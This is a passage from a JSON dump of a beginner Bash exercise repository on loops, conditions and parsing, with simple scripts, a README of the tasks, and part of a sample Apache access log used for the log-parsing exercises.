    "content": "#!/usr/bin/env bash\n# display time for 12 hours and 59 minutes\n\nhour=0\n\nwhile [ \"$hour\" -le 12 ]; do\n  echo \"Hour: $hour\"\n  \n  minute=1\n  \n  while [ \"$minute\" -lt 60 ]; do\n    echo \"$minute\"\n    minute=$((minute + 1))\n  done\n\n  hour=$((hour + 1))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/8-for_ls",
    "content": "#!/usr/bin/env bash\n# ls using for loop\n\nfor file in *; do\n  echo \"$file\" | cut -d '-' -f 2;\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/9-to_file_or_not_to_file",
    "content": "#!/usr/bin/env bash\n# alx school file checker\n\nfile=\"school\"\n\n# checks if file exists\nif [ -e \"$file\" ]; then\n\n  echo \"school file exists\"\n\n  # checks if file is empty\n  if [ ! -s \"$file\" ]; then\n    echo \"school file is empty\"\n\n    # checks if file is a regular file\n    if [ -f \"$file\" ]; then\n      echo \"school is a regular file\"\n    fi  \n\n  else\n\n    echo \"school file is not empty\"\n\n    # checks if file is a regular file\n    if [ -f \"$file\" ]; then\n      echo \"school is a regular file\"\n    fi  \n  \n  fi\n\nelse\n  \n  echo \"school file does not exist\"\n\nfi\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/README.md",
    "content": "# 0x04. Loops, conditions and parsing \n\n## Resource\n\n- [Loops sample](https://tldp.org/LDP/Bash-Beginners-Guide/html/sect_09_01.html)\n- [Variable assignment and arithmetic](https://tldp.org/LDP/abs/html/ops.html)\n- [Comparison operators](https://tldp.org/LDP/abs/html/comparison-ops.html)\n- [File test operators](https://tldp.org/LDP/abs/html/fto.html)\n- [Make your scripts portable](https://www.cyberciti.biz/tips/finding-bash-perl-python-portably-using-env.html)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-RSA_public_key.pub\">0. Create a SSH RSA key pair</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/HkVtBRMg/image.png' border='0' alt='image'/></a><br>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://askubuntu.com/questions/61557/how-do-i-set-up-ssh-authentication-keys\">Linux and Mac OS users</a></li>\n      <li><a href=\"https://docs.rackspace.com/support/how-to/generating-rsa-keys-with-ssh-puttygen/\">Windows users</a></li>\n      <li><a href=\"https://www.youtube.com/watch?v=iuqXFC_qIvA&t=46s\">data centers</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./1-for_best_school\">1. For Best School loop</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/XYvX60Nr/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-while_best_school\">2. While Best School loop</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/KcfDJy01/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-until_best_school\">3. Until Best School loop</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/y8jvVtx4/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./4-if_9_say_hi\">4. If 9, say Hi!</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/vBCCykBL/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./5-4_bad_luck_8_is_your_chance\">5. 4 bad luck, 8 is your chance</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/SxMkcYGF/image.png' border='0' alt='image'/></a><br>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://freakonomics.com/2006/07/05/lucky-8s-in-china/\">8 in the Chinese culture</a></li>\n      <li><a href=\"https://en.wikipedia.org/wiki/Chinese_numerology#Four\">4 in the Chinese culture</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./6-superstitious_numbers\">6. Superstitious numbers</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/XvHdRPT0/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./7-clock\">7. Clock</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/YqRc5vMR/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./8-for_ls\">8. For ls</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/wjzrjgTv/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./9-to_file_or_not_to_file\">9. To file, or not to file</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/RFwsBY5f/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./10-fizzbuzz\">10. FizzBuzz</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/85bsJLq3/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-read_and_cut\">11. Read and cut</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/FHQyLVqF/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./101-tell_the_story_of_passwd\">12. Tell the story of passwd</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/g0vNZG3x/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/\">Understanding /etc/passwd</a></li>\n      <li><a href=\"https://tldp.org/LDP/abs/html/internalvariables.html\">IFS (internal field separator)</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./102-lets_parse_apache_logs\">13. Let's parse Apache logs</a></summary><br>\n<a href='https://postimg.cc/rDm2Zg6H' target='_blank'><img src='https://i.postimg.cc/P5bfxFSd/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://en.wikipedia.org/wiki/Apache_HTTP_Server\">Apache HTTP Server</a></li>\n      <li><a href=\"https://en.wikipedia.org/wiki/List_of_HTTP_status_codes\">HTTP status codes</a></li>\n      <li><a href=\"https://www.the-art-of-web.com/system/logs/\">System: Analyzing Apache log Files</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./103-dig_the-data\">14. Dig the data</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/T2WBc5gs/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/apache-access.log",
    "content": "81.65.217.135 - - [07/Feb/2016:07:22:16 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n81.65.217.135 - - [07/Feb/2016:07:22:16 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n178.137.93.235 - - [07/Feb/2016:07:27:24 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29286 \"http://jm-aj.com/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)\"\n178.137.93.235 - - [07/Feb/2016:07:28:33 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29452 \"http://alborzan.com/\" \"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\"\n178.255.215.65 - - [07/Feb/2016:07:31:02 -0800] \"GET /robots.txt HTTP/1.1\" 200 386 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n178.255.215.65 - - [07/Feb/2016:07:32:07 -0800] \"GET /comments/feed/ HTTP/1.1\" 200 1442 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n86.246.217.7 - - [07/Feb/2016:07:36:48 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 Vienna/3.0.9\"\n41.214.40.213 - - [07/Feb/2016:07:38:19 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n41.214.40.213 - - [07/Feb/2016:07:38:19 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n41.214.40.213 - - [07/Feb/2016:07:38:20 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n41.214.40.213 - - [07/Feb/2016:07:38:21 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n5su4nS9Fe1sa6hof-50x50.jpg HTTP/1.1\" 200 1897 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n41.214.40.213 - - [07/Feb/2016:07:38:24 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n82.245.148.227 - - [07/Feb/2016:07:39:00 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Linux; Android 5.1; XT1039 Build/LPB23.13-17.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n82.245.148.227 - - [07/Feb/2016:07:39:00 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Linux; Android 5.1; XT1039 Build/LPB23.13-17.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_n9u925ynzx1spe2e1-50x50.png HTTP/1.1\" 200 7248 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:25 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:07:39:34 -0800] \"GET /le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/?cf_action=sync_comments&post_id=307 HTTP/1.1\" 200 309 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n83.155.173.169 - - [07/Feb/2016:07:43:04 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:05 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:05 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:05 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:05 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:05 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n83.155.173.169 - - [07/Feb/2016:07:43:07 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/?cf_action=sync_comments&post_id=13 HTTP/1.1\" 200 308 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n198.58.102.96 - - [07/Feb/2016:07:52:29 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n192.0.228.136 - - [07/Feb/2016:07:57:21 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:21 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:22 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:22 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:24 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:25 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n192.0.228.136 - - [07/Feb/2016:07:57:35 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 309 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:08:02:25 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/author/phil/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:08:02:25 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/author/phil/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n82.235.197.66 - - [07/Feb/2016:08:02:25 -0800] \"GET /wp-content/uploads/2015/02/tumblr_inline_njsizxf3W31r1bjfi-300x225.jpg HTTP/1.1\" 200 13168 \"http://techmeup.co/author/phil/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.102.155 - - [07/Feb/2016:08:03:29 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n178.255.215.65 - - [07/Feb/2016:08:05:29 -0800] \"GET /feed/ HTTP/1.1\" 200 20950 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n50.116.28.209 - - [07/Feb/2016:08:12:03 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.102.117 - - [07/Feb/2016:08:22:02 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n178.137.93.235 - - [07/Feb/2016:08:29:09 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 307 \"http://hspline.com/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)\"\n62.210.162.19 - - [07/Feb/2016:08:33:05 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (linux; u; android 4.1.1; ja-jp; sgpt12 build/tjs0166) applewebkit/534.30 (khtml, like gecko) version/4.0 safari/534.30 yjapp-android jp.co.yahoo.android.yjtop/2.1.8\"\n62.210.162.19 - - [07/Feb/2016:08:33:07 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (linux; u; android 4.1.1; ja-jp; sgpt12 build/tjs0166) applewebkit/534.30 (khtml, like gecko) version/4.0 safari/534.30 yjapp-android jp.co.yahoo.android.yjtop/2.1.8\"\n209.51.197.34 - - [07/Feb/2016:08:34:58 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"-\" \"Java/1.7.0_10\"\n173.244.168.226 - - [07/Feb/2016:08:34:58 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203836 \"-\" \"Java/1.7.0_10\"\n180.76.15.30 - - [07/Feb/2016:08:39:24 -0800] \"GET / HTTP/1.1\" 200 7237 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n40.77.167.6 - - [07/Feb/2016:08:51:13 -0800] \"GET /john-sheehan-ceo-et-co-fondateur-de-runscope/ HTTP/1.1\" 200 10673 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n40.77.167.6 - - [07/Feb/2016:08:51:15 -0800] \"GET /teresa-colombi-ou-le-futur-de-lexperience-utilisateur/ HTTP/1.1\" 200 8890 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.27 - - [07/Feb/2016:08:51:19 -0800] \"GET /10-questions-a-arnaud-ruiz-le-plus-frenchie-des/ HTTP/1.1\" 200 9353 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.27 - - [07/Feb/2016:08:51:21 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.27 - - [07/Feb/2016:08:51:23 -0800] \"GET /nathan-barraille-lead-developer-a-slideshare/ HTTP/1.1\" 200 10506 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [07/Feb/2016:08:51:29 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7340 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [07/Feb/2016:08:51:31 -0800] \"GET /pierre-lacombe-de-parrot-a-la-poursuite-du/ HTTP/1.1\" 200 9793 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n40.77.167.41 - - [07/Feb/2016:08:51:42 -0800] \"GET /frenchweb-de-lautre-cote-de-la-camera/ HTTP/1.1\" 200 8057 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n40.77.167.41 - - [07/Feb/2016:08:51:44 -0800] \"GET /rostom-cheikh-aissa-de-gdf-suez-complexity-is/ HTTP/1.1\" 200 9368 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n104.236.89.109 - - [07/Feb/2016:09:01:44 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)\"\n62.210.142.23 - jez [07/Feb/2016:09:06:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n178.255.215.65 - - [07/Feb/2016:09:08:10 -0800] \"GET /?p=47 HTTP/1.1\" 301 407 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n104.131.170.67 - - [07/Feb/2016:09:09:42 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)\"\n141.8.132.38 - - [07/Feb/2016:09:18:16 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [07/Feb/2016:09:21:33 -0800] \"GET /2014/04/apple-touch-icon.png HTTP/1.1\" 404 4924 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n213.245.234.126 - - [07/Feb/2016:09:24:39 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n213.245.234.126 - - [07/Feb/2016:09:24:51 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 301 374 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n213.245.234.126 - - [07/Feb/2016:09:24:52 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n54.144.69.96 - - [07/Feb/2016:09:27:43 -0800] \"GET /brice-favre-la-soif-de-creer/ HTTP/1.1\" 200 9290 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n84.14.175.8 - - [07/Feb/2016:09:34:29 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 304 188 \"-\" \"Mozilla/4.0 (compatible;)\"\n86.246.217.7 - - [07/Feb/2016:09:36:50 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 